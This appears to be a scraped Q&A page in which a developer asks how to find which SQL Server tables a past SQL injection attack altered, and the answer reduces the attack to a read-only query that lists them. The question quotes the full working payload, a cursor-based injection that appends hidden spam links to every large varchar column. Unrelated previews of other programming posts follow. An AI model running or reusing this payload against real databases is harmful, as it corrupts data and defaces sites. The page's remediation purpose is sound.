sql server - Find the tables affected by SQL injection -


recently, discovered 1 of our aspx handlers targeted sql injection attack. made possible fact took substring of url starting @ index x until end of url string , matched records in database made easy attackers.

here example of injection performed:

;declare @c cursor; declare @d varchar(4000); set @c=cursor  select  'update ['+table_name+']  set ['+column_name+']=['+column_name+']+case abs(checksum(newid()))%7  when 0 ''''+char(60)+''div style="display:none"''+char(62) +''are abortions safe '' +char(60)+''a href="http:''+char(47)+char(47) +''www.ooblong.com''+char(47)+''blog''+char(47) +''template''+char(47)+''page''+char(47)+''abortion-clinics-nyc.aspx"'' +char(62)+case abs(checksum(newid()))%3  when 0 ''reasons against abortion''  when 1 ''pregnant abortion''  else ''pill pregnancy termination'' end  +char(60)+char(47)+''a''+char(62)+'' how abortion cost'' +char(60)+char(47)+''div''+char(62)+'''' else '''' end'  sysindexes  inner join sysobjects o  on i.id=o.id  inner join information_schema.columns  on o.name=table_name  where(indid=0 or indid=1)  , data_type '%varchar'  and(character_maximum_length=-1 or character_maximum_length=2147483647); open @c; fetch next @c @d; while @@fetch_status=0  begin exec (@d); fetch next @c @d; end; close @c--

we have secured our aspx handlers refuse these kinds of requests. find out tables affected attack. discovered @ least 2 tables affected, afraid there more. how can reverse engineer above sql find out tables affected?

just take query you've shown , strip off unnecessary details attack itself, , get:

select table_name, column_name sysindexes  inner join sysobjects o  on i.id=o.id  inner join information_schema.columns  on o.name=table_name  where(indid=0 or indid=1)  , data_type '%varchar'  and(character_maximum_length=-1 or character_maximum_length=2147483647);

tables , columns in output of query used in cursor , affected attack you've mentioned.


-

Comments

Post a Comment

Popular posts from this blog

c# - Binding a comma separated list to a List<int> in asp.net web api -

the default binder in web api expecst http://url.com/webapi/report/?pageids=3243&pageids=2365 to bind public ihttpactionresult report(list<int> pageids){ // exciting webapi code} i wish bind http://url.com/webapi/report/?pageids=3243,2365 as running out of space in url get . i have created class public class commaseparatedmodelbinder : system.web.http.modelbinding.imodelbinder { public bool bindmodel(httpactioncontext actioncontext, modelbindingcontext bindingcontext) { //binding in here } } and registered in webapiconfig.cs var provider = new simplemodelbinderprovider( typeof(list<int>), new commaseparatedmodelbinder()); config.services.insert(typeof(modelbinderprovider), 0, provider); i have altered method signature use model binder so public ihttpactionresult report( [modelbinder] list<int> pageids){ // exciting webapi code} however break point in binder not being
Read more

Delphi 7 and decode UTF-8 base64 -

in delphi 7, have widestring encoded base64(that received web service widestring result) : pd94bwwgdmvyc2lvbj0ims4wij8+dqo8c3ryaw5nptiq2lpyqjwvc3ryaw5npg== when decoded it, result not utf-8: <?xml version="1.0"?> <string>طھط³طھ</string> but when decoded base64decode.org, result true : <?xml version="1.0"?> <string>تست</string> i have use encddecd unit decodestring function. the problem have using decodestring . function, in delphi 7, treats decoded binary data being ansi encoded. , problem text utf-8 encoded. to continue encddecd unit have couple of options. can switch decodestream . instance, code produce utf-8 encoded text file data: {$apptype console} uses classes, encddecd; const data = 'pd94bwwgdmvyc2lvbj0ims4wij8+dqo8c3ryaw5nptiq2lpyqjwvc3ryaw5npg=='; var input: tstringstream; output: tfilestream; begin input := tstringstream.create(data); try output := tfilestream.
Read more

html - Is there any way to exclude a single element from the style? (Bootstrap) -

so, have img logo, overlaid on div styled background-image: url("...") , , both elements inside 2 div classes .to-color , .to-overlay respectively, black transparent overlay. is there way exclude logo style given these 2 classes? here's jsfiddle example: link html , css example: - html - <div class="to-color"> <div class="to-overlay"> <div class="respo"> <div class="row"> <div class="col-xs-4 col-xs-offset-4 text-center"> <img src="http://ansonalex.com/wp-content/uploads/2011/06/google-logo-768x260.png" alt="..." class="img-responsive"> </div> </div> </div> </div> </div> - css - .to-color { background-color: #000; } .to-overlay { opacity : 0.5; } .respo { background-image: url("https://source.unsplash.com/category/objects/1600x900"); background-position: center center;
Read more